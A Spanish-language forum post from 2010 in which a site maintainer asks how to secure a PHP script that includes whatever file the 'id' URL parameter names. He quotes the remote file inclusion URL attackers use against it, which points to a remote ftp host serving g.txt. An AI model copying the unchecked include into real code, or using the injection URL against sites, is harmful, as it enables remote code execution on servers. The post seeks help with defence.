Ver Mensaje Individual
  #1 (permalink)  
Antiguo 15/09/2010, 15:05
Avatar de loncho_rojas
loncho_rojas
Colaborador
 
Fecha de Ingreso: octubre-2008
Ubicación: En el mejor lugar del mundo
Mensajes: 2.704
Antigüedad: 16 años, 2 meses
Puntos: 175
Filtrar codigo PHP para mayor seguridad, o sustuir po un metodo similar

Hola.. como estan, me han pasado una pagina Web para mantenerla, pero en estas lineas de script me han detectado una inyeccion de codigo:

Código PHP:
Ver original
  1. <?php
  2.  
  3.     if(!isset($_GET['id']))
  4.     {
  5.     include("inicio.php");
  6.     } else {
  7.     if(file_exists($_GET['id'].".php"))
  8.     {
  9.         include($_GET['id'].".php");
  10.     } else {
  11.         include("error.php");
  12.     }
  13.     }
  14.    
  15.  
  16. ?>

esto actua como un Frame que llama a otras paginas, y si no existe, tira la pagina de error

Como podría actualizar este código? o como podria generar un filtro para que no me inyecten un código..

(lo que me estan inyectando es esto: favor no abrirlo, no es un virus, solo como ejemplo)

index.php? id=ftp:// lucronarede. t5.com. br:864798@
lucronarede.t5.com. br/g.txt?

Lo separo todo para que no lo tome como LINK... quiero evitar que sigan entrando desde aqui.. necesito un cable por favor..

Gracias
__________________
Ayudo con lo que puedo en el foro, y solo en el foro.. NO MENSAJES PRIVADOS.. NO EMAILS NI SKYPE u OTROS.

Antes de hacer un TOPICO piensa si puedes hallarlo en Google o en el Buscador del Foro...